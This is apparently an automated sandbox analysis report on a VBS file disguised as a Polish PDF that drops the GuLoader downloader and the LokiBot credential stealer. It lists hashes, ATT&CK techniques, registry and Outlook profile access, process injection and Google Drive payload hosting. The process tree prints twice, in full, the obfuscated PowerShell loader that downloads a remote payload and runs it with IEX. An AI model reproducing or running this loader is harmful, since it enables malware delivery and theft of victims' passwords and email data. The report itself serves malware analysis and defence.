guloader | 7d326abdb7b5f1ecee1ab0385b9d4a569a1d355b479107aef9221fd213cfd23c

Analysis

max time kernel
149s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
22-09-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WNIOSEKBUDETOWY09182024pdf.vbs
Size

32KB
MD5

efc01dc5a4acefe058450f0dee1c1e9d
SHA1

f6244111b8588a7105124c4f4c40f6caa2bffa28
SHA256

7d326abdb7b5f1ecee1ab0385b9d4a569a1d355b479107aef9221fd213cfd23c
SHA512

eab5f2a42206d42628ab77d566b7394e6dafbb785b5cfd3abc357c5eed4dfce501246246e67ffa0e4389c974ccf60dda598f64a3277925cca74fb0611505ea4d
SSDEEP

384:Z9vOg3F19w8sNthahA0ZvF+io9vUErJHyvRe1P93fvTnm:Zp3F1qt0qA/oZJce1VHTm

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
23	4304	powershell.exe
25	4304	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ImagingDevices.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	ImagingDevices.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ImagingDevices.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	drive.google.com
23	drive.google.com
33	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
692	ImagingDevices.exe
692	ImagingDevices.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3432	powershell.exe
692	ImagingDevices.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3432 set thread context of 692	3432	powershell.exe	123

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4304	powershell.exe
4304	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe

Suspicious behavior: MapViewOfSection 23 IoCs

pid	Process
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	692	ImagingDevices.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 4304	3100	WScript.exe	88
PID 3100 wrote to memory of 4304	3100	WScript.exe	88
PID 4304 wrote to memory of 2180	4304	powershell.exe	90
PID 4304 wrote to memory of 2180	4304	powershell.exe	90
PID 4304 wrote to memory of 1148	4304	powershell.exe	96
PID 4304 wrote to memory of 1148	4304	powershell.exe	96
PID 1148 wrote to memory of 3432	1148	cmd.exe	97
PID 1148 wrote to memory of 3432	1148	cmd.exe	97
PID 1148 wrote to memory of 3432	1148	cmd.exe	97
PID 3432 wrote to memory of 4732	3432	powershell.exe	99
PID 3432 wrote to memory of 4732	3432	powershell.exe	99
PID 3432 wrote to memory of 4732	3432	powershell.exe	99
PID 3432 wrote to memory of 4680	3432	powershell.exe	101
PID 3432 wrote to memory of 4680	3432	powershell.exe	101
PID 3432 wrote to memory of 4680	3432	powershell.exe	101
PID 3432 wrote to memory of 5068	3432	powershell.exe	102
PID 3432 wrote to memory of 5068	3432	powershell.exe	102
PID 3432 wrote to memory of 5068	3432	powershell.exe	102
PID 3432 wrote to memory of 2536	3432	powershell.exe	103
PID 3432 wrote to memory of 2536	3432	powershell.exe	103
PID 3432 wrote to memory of 2536	3432	powershell.exe	103
PID 3432 wrote to memory of 4028	3432	powershell.exe	104
PID 3432 wrote to memory of 4028	3432	powershell.exe	104
PID 3432 wrote to memory of 4028	3432	powershell.exe	104
PID 3432 wrote to memory of 4620	3432	powershell.exe	105
PID 3432 wrote to memory of 4620	3432	powershell.exe	105
PID 3432 wrote to memory of 4620	3432	powershell.exe	105
PID 3432 wrote to memory of 1616	3432	powershell.exe	106
PID 3432 wrote to memory of 1616	3432	powershell.exe	106
PID 3432 wrote to memory of 1616	3432	powershell.exe	106
PID 3432 wrote to memory of 540	3432	powershell.exe	107
PID 3432 wrote to memory of 540	3432	powershell.exe	107
PID 3432 wrote to memory of 540	3432	powershell.exe	107
PID 3432 wrote to memory of 1420	3432	powershell.exe	108
PID 3432 wrote to memory of 1420	3432	powershell.exe	108
PID 3432 wrote to memory of 1420	3432	powershell.exe	108
PID 3432 wrote to memory of 436	3432	powershell.exe	109
PID 3432 wrote to memory of 436	3432	powershell.exe	109
PID 3432 wrote to memory of 436	3432	powershell.exe	109
PID 3432 wrote to memory of 2812	3432	powershell.exe	110
PID 3432 wrote to memory of 2812	3432	powershell.exe	110
PID 3432 wrote to memory of 2812	3432	powershell.exe	110
PID 3432 wrote to memory of 3800	3432	powershell.exe	111
PID 3432 wrote to memory of 3800	3432	powershell.exe	111
PID 3432 wrote to memory of 3800	3432	powershell.exe	111
PID 3432 wrote to memory of 968	3432	powershell.exe	112
PID 3432 wrote to memory of 968	3432	powershell.exe	112
PID 3432 wrote to memory of 968	3432	powershell.exe	112
PID 3432 wrote to memory of 4188	3432	powershell.exe	113
PID 3432 wrote to memory of 4188	3432	powershell.exe	113
PID 3432 wrote to memory of 4188	3432	powershell.exe	113
PID 3432 wrote to memory of 4648	3432	powershell.exe	114
PID 3432 wrote to memory of 4648	3432	powershell.exe	114
PID 3432 wrote to memory of 4648	3432	powershell.exe	114
PID 3432 wrote to memory of 4688	3432	powershell.exe	115
PID 3432 wrote to memory of 4688	3432	powershell.exe	115
PID 3432 wrote to memory of 4688	3432	powershell.exe	115
PID 3432 wrote to memory of 4364	3432	powershell.exe	116
PID 3432 wrote to memory of 4364	3432	powershell.exe	116
PID 3432 wrote to memory of 4364	3432	powershell.exe	116
PID 3432 wrote to memory of 4440	3432	powershell.exe	117
PID 3432 wrote to memory of 4440	3432	powershell.exe	117
PID 3432 wrote to memory of 4440	3432	powershell.exe	117
PID 3432 wrote to memory of 2252	3432	powershell.exe	118

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ImagingDevices.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ImagingDevices.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WNIOSEKBUDETOWY09182024pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Alvildes.Scy && echo t"
    3⤵
    PID:2180
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Juttying Bankbetjentene Backwardly Gulvmaattes Kameluldsfrakke Kamerafoeringen Dieselpriser #>;$Polemisering='Departementsvalgraadets';<#Potencies Manipuleringers Surtouts Inexist Brddevgges Krogstrup Barometer #>;$Beterschap30=$host.PrivateData;If ($Beterschap30) {$Statsamters++;}function Skovsanger($polyribosome){$Kontinentalsoklernes=$polyribosome.Length-$Statsamters;for( $Tastearbejderne=5;$Tastearbejderne -lt $Kontinentalsoklernes;$Tastearbejderne+=6){$Afsluttede+=$polyribosome[$Tastearbejderne];}$Afsluttede;}function Wined($Sebastine){ . ($Skyggetilvrelsernes253) ($Sebastine);}$Truculentness=Skovsanger 'BobblMKonfeoRul izHobnoiP edelC agolSva.ea r.ch/Bidra5Damok. M st0Figbi Re en(ThousWM ddeiJog inRorsmdTaroko C ttwSkimlsParad Medd.N AareT,icro Tilba1Scree0Archp.Ove p0G,tea;slage SpaltWBetoniBi onnAlbru6 Rso 4S,cia;Progr velgrxKar o6Ansg.4 Ange;ating Kamerr DetevMulta:archw1Ami,p2Blott1Liqua.Insci0Co.po)Tipie Adre GP,edeePa.atcSk ldk Dicho T,rm/Manin2Huber0 Lab,1fasth0 Skab0Opgav1Occur0Def n1Drogu LuisaFSenniiSwashrSidese edalfDrnhaoSti uxAlpel/ Volu1ocurr2 High1Prete.Banan0 G.ip ';$Arbejderfamilie=Skovsanger 'RegenUsget SOverbE He iR Grim-Ers aaSawargMisleeLi.atN Erstt,esic ';$Trekantdramaers12=Skovsanger 'a lejhNonretskrivtBedrvpOrthos Al a: C eq/Menox/ SnyddFdrelr ChnuiPsychv Sp ieForsi.AscengLinieoTelefochassg RefelCloakeBisi..TimotcPatt,oGammem dyk /C raluelud,cBeto ?.evefeKlo kxLreplpacromoOver.r G,mmtProse=Vovend.nfreoFor.bwVittun Pro lUnderoUn ecaRakufdConsi&softfi DispdDuroq=Reali1HeediIDisp LCon euNeurap O tlkTeathJ Res.xOverwZ Sor QRatioIDocumm.onspTKarriN GranY Mirr3 mblQBrian9 Aerox Kvad7Scuffe GlarOHegelS elteMNonpa4ResallInducn eace_EndowiDisart D,rs7 SlenWC,ackK,nmot ';$kalkerpapirer=Skovsanger 'Fumin> ann ';$Skyggetilvrelsernes253=Skovsanger 'UntasIyammeEPeri.XM rab ';$Klostret='Braid';$Detroniseringers235 = Skovsanger ' Gor e Gaa.cInterhUnscroal.am Rhaet%IridoaSt rapEcophp altodSaxataSid utLuftfaUnbel%Tilli\InterA Fst lscintvN tvriThamulS ivedFrpere TortsMisbe. H,rsSAlethcA.alyy Carb Ench&Reper& Ve.t FoyseeSangscCo,kbh rgaoFiltn oph.ttOsmol ';Wined (Skovsanger 'Chris$DeforgProvolCurb oAfdknbForbiaStorklshott:Neut Tskatti ncomNoncoeBu.nilK unsoSmaapf tormtprogreUnderrForwanEradieGy.it=Ha pu(ForwacSacham VitedTriko hudso/Sma,pc Proj Knott$Tipt DRubypeGrac tSvederDr ngoHumlenbutikiUn apsCivileConserUmageiKvivan OprrgSpejleUngenr k nssHersa2Accts3Brach5Heina)Skatt ');Wined (Skovsanger 'Kvlde$Rrelsg BewrlBahamoH ggeb Dt,iaSaliglUdmug: UnpeC PhonaceriutBestye ystl.rres=Trass$CompaTSolosrT,rtueslagvk RipeaCountnhypomtTandpdfljt rarranafieldmQuatea SurfeBenzir Raavsfibul1 Gr c2Hustu.O tstsSan tpDeadnlCafetiTalmutGroce(Rh bd$MxdwokClangaSpolelGestikBankbeUforsrAtomtpY.ntnaUmiddpPedoliUnprorFirkeePeachrQuote)ingen ');Wined (Skovsanger 'Epilh[ ArisN.patteFlannt wal.unsinSMacadezealor YorkvbodsviCallic angre k lkPSlakioPlatiiTrivinSvejst SubdMEp,rta etspnI looaP.ttyg C.taeProter Awkw]Fr va: Dist:VestvS ryppeOverncRenseu uperrFeteri FalsttekstypluraPUsmidrAntenoFemogtDefanoSlutncstanco AgnalTakke Enevl=Popul Sca e[breezN Resee Dra t,ngag.Mini S Sal e,ranicUniv u nderr strainavnktA smey P,agPFost rG uldoLit,itS ileoG sfocAtheroegnsplWilliTOmklayNuancpPrekneisrae]Eng.n:S,riv:SlackTRoys,lepidesInme,1 Re.b2Galva ');$Trekantdramaers12=$Catel[0];$Tsutsutsi= (Skovsanger 'Staa $Ce trGscabel.udesO Im.ebIsabea TilslKanal: elloROnk,eo,elegn TrouK odmaeVirksdThingO ountrIm,taS Stud=Su.erNFjer E IsocwSkrve-S rghoYo hubSus ejIsoceE voucCAudietNon l UndersHookuyMaskes TempTFjel,E lesmCavet. magN FejlECask T vejr. FurbwHelinePot ubSubagc Al.ulc ntrI Af eEAmat,NOverdt');$Tsutsutsi+=$Timelofterne[1];Wined ($Tsutsutsi);Wined (Skovsanger 'Binom$ UdserInfero ChinnScrubkRa doeToye dKroneo BundrHoydasFinge.Theo HP osteshortaCir ud raa eS allrst,rrsClea [Feltp$dis,oAF ilurDeltrb K tieBambujEposedEyebae forlr GofffHeropa V tfm reyiLyskolOverdiThoreeDi.tr]Krvel=Pro.e$ nvoiTInexcr ,irkuSomatcFaileuSkattlThiodeGlyconFortytMeta n .ncee NedfsSper,s Er v ');$adumbrating=Skovsanger ' Farm$ heemrStakaoAutoknRntgek ilkeePu hidSjusso L ngr Bo gs chro. SheiDSkopuoIrregw Almin Antil Funko TempaStjerd AlloFCleuciSwashlProdueAnbra(Antel$ RubbTUmorsrBenzoeF xnuk issa BalinHighpt IntedF rvar AffiaUndepmH,rmia FataeIsolarNeurasretun1Spejl2Pyrrh,I,sti$ versCMisy aEdentsUkuletunimaiLaetslRentriHinduaCadisn TapesSverikDecer)Andag ';$Castiliansk=$Timelofterne[0];Wined (Skovsanger 'Nedsk$ KoblG W,nrlColonOFixedB BureaevolulEvolv:Desinn atirOSpindNP ykoOFe ryc SvinCPro auS.btlP PeteAPreconOvergcPlagieT.ves= Fl l( UnprTGumpee Br gS QuarTBeeme-CoproP FlecaGazint darwHUnslu S.st$R.tuaCOve sAEldonsFetatT PariIHjrneLs.julikortba AfslN Tamps LejlkHydra)Jaukn ');while (!$Nonoccupance) {Wined (Skovsanger 'Bloc,$Zin kgPag tlO,erfoPastibOstraasommalGol e: Bl nPFusere La.rrA,ertiOp oskBeachuParkamS mbaeLuxurnResatsTeate=Galjo$TrkkotKolacrSko suUdseeeIndfa ') ;Wined $adumbrating;Wined (Skovsanger 'PolleS KonttFerieaPapporG avht Appe-FuskeS DianlblackeLiv feUnimppklker Komm4 cale ');Wined (Skovsanger 'Udski$Keenag AnellLanghoMorribVandfaTeatrl C pi:Re,igNSylt oAmninn TidsoMyxovc agecBlathuAppospStoffaHardwn StaacKil weSk.le=Naadi(AgeusTFeldieMegadsIndhot Klde-BssekPh rrea,ekantO eishEnh d .olke$HoffmC Pr sa Atoms LysttMcneiiInstrlLsrivioclocaForstnstrdesAbstikIncon)Ek ek ') ;Wined (Skovsanger 'Pr nt$Vaco,gLeucolGrueloBortlb ypopaCordolSteph:UndefNApophoUnsh nTangeoFolkebPolycsmaaneeManomrHutiavDo,siaOverlnBar.ecGenaneGgesksRatsb=Reco.$.ryllgKedellVerdeoDialibProtoaKindtl anm:FortiPriferr UvejeLaartd Fol.iTilkasUnpercSukkerResteiSo,tim Rat iSaaninSynera UafstD bbee.rimmdBlind7Handm7Inte +Fa ou+Minis% Flyv$ no.tCKludgaDefrot Brite Clegl Kore.Hyp.pc esuoAftllu Svign StattAp co ') ;$Trekantdramaers12=$Catel[$Nonobservances];}$Abdaria=298727;$Detinet=29520;Wined (Skovsanger 'Styrt$UncifgRevollb.lleoBhadobR deraUdvallFarms: ondiHantecvOvermi Fortd ,nivbNedrigPostke For r Ordb Salm=jules Ch orG CymbeAshietUntil-BelugC BundoAmph.nPaatet,iscoe SammnFortats ott Sculp$ onprCPopolaPrkensLuft tstolpi For.l TraniRigd aUnd rnEternsPh lokSiden ');Wined (Skovsanger 'F erc$AcrosgMak olrensko.ortebE straShapalInlym:ForhaUNicomn Chylcre leoK edidHenredBillelDispee Ht edMil s Ta ke=Ewryb arth[Povl.SWe ghyRerousHal,ttAmphieReglemVit l. CompCSkem o tr rn edrv Fe deDrainrForgltKamuf] Biot:Cursu: SyneF SkatrSn.seo D.anm ha.eBU.creaZestis QuipeCabal6Mycos4 FonoSIc.notPhonorKalveibillin C.opgDe os(aceto$Dyea H SkrmvConnii VetedOpholb AdelgF rvaeMagnerSpag.)Pren. ');Wined (Skovsanger 'Randi$ ofteg RedelEmagroSquibb Gldsa delslbozal:Hvl eCRappeiBestyr adj c IndsuBrn pmItch,sKir bc WillrBomb i.ovtwvSkafte Houh Forre=Poisu Cirke[pola S b,gsysvej sRa grt Evape Afk mWoode.panhaT kineFors x.ookit Dump.GlemmEbebudnReclic ZeosoRustldMediciAlkenn skatgBerap] Nona:Debla:,emerABrac,S BestC opcaIBacksIBetwe.UlushGBaetyeKatabtUnscaS OmsttTraphr mphijoinin .empgSk ks(epiku$ForeoUH,mozn rrkncBestrooystcd Hr,pd ,ibilRepubeG ocedArmbr) Pla, ');Wined (Skovsanger ',iutl$InstrgGi.oelD.sgro,arfubGingiaNysnvl rchm:Dep sA.hytodPinbauJulemmHaemobCali,rNonfeaOffentHaglbi Datao Kis n Koalstoot =Lynak$SpiraCOverciAmmedrProgrcUnsaluRo.tem UnresV,rdecC rberD rehi.wangv.ibrseBilbo.CompusUn.oquKen,abTalsts BeratSwandrTotaliEjdamnAdskigHjemk(Regob$IrideACa onbPr grdOlympa vlstrWadmaiMounda Soll, uckh$Zig,aD Renle Herrt R.beiSturdnsbeboePunilt urus)Subto ');Wined $Adumbrations;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
